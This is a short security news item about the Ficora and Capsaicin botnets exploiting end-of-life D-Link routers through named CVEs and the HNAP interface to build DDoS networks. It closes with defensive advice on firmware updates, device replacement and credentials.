Hackers abuse outdated D-Link routers for botnets
Take action: If you are using D-Ling routers, be conscious that they are targeted by hackers and exploited. Make sure your router firmware is updated to the latest version and replace any end-of-life devices that no longer receive security updates.
Learn More
Two malware botnets - Ficora and Capsaicin - are targeting outdated D-Link routers. The campaign targets end-of-life D-Link devices and those running outdated firmware versions, including popular models such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.
The attackers exploit several vulnerabilities tracked as CVE-2015-2051 (CVSS score 9.8), CVE-2019-10891 (CVSS score 9.8), CVE-2022-37056 (CVSS score 9.8), and CVE-2024-33112 (CVSS score 7.5) to gain initial access to these devices.
The attack methodology exploits these vulnerabilities, followed by leveraging weaknesses in D-Link's HNAP (Home Network Administration Protocol) management interface. The attackers execute malicious commands through GetDeviceSettings actions, enabling data theft and shell script execution, with the primary purpose of creating a distributed denial-of-service (DDoS) network.
The Ficora botnet, a newer variant of the Mirai botnet, has shown random targeting patterns with activity surges in October and November. The botnet has focus on Japan and the United States.
The Capsaicin botnet showed a concentrated burst of activity between October 21-22, primarily targeting East Asian countries.
The exact number of affected devices and financial impact are not clear. Users should ensure their router firmware is updated to the latest version, replace any end-of-life devices that no longer receive security updates, change default admin credentials to strong, unique passwords, and disable unnecessary remote access interfaces.
